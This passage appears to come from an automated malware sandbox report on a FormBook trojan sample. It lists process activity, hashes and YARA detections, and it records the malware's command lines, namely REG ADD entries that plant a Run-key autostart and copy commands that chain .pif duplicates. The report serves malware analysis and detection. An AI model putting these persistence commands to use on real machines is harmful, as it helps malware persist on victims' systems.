                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:08:49:30
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0x700000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:08:49:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:08:49:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:08:49:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:08:49:37
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:08:49:37
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:08:49:38
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xe20000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:08:49:38
                                                            Start date:23/07/2024
                                                            Path:C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe"
                                                            Imagebase:0xed0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:17
                                                            Start time:08:49:39
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif"
                                                            Imagebase:0xf10000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:08:49:40
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\findstr.exe"
                                                            Imagebase:0xf00000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:19
                                                            Start time:08:49:44
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:08:49:44
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:08:49:44
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:08:49:46
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:08:49:46
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:08:49:47
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x190000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:08:49:47
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x890000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:08:49:49
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0xb80000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:08:49:57
                                                            Start date:23/07/2024
                                                            Path:C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe"
                                                            Imagebase:0xed0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:29
                                                            Start time:08:49:57
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:08:49:58
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:31
                                                            Start time:08:49:58
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:08:50:00
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:08:50:00
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:34
                                                            Start time:08:50:01
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x8e0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:08:50:05
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x7a0000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:08:50:11
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:08:50:11
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:08:50:11
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:40
                                                            Start time:08:50:13
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:41
                                                            Start time:08:50:13
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6a5670000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:42
                                                            Start time:08:50:14
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xa00000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:08:50:16
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x140000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:08:50:19
                                                            Start date:23/07/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:08:50:22
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:46
                                                            Start time:08:50:22
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:47
                                                            Start time:08:50:23
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:48
                                                            Start time:08:50:25
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:49
                                                            Start time:08:50:25
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:08:50:26
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xea0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:08:50:26
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0xf60000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:08:50:33
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:53
                                                            Start time:08:50:33
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:54
                                                            Start time:08:50:33
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:55
                                                            Start time:08:50:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:56
                                                            Start time:08:50:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:57
                                                            Start time:08:50:36
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
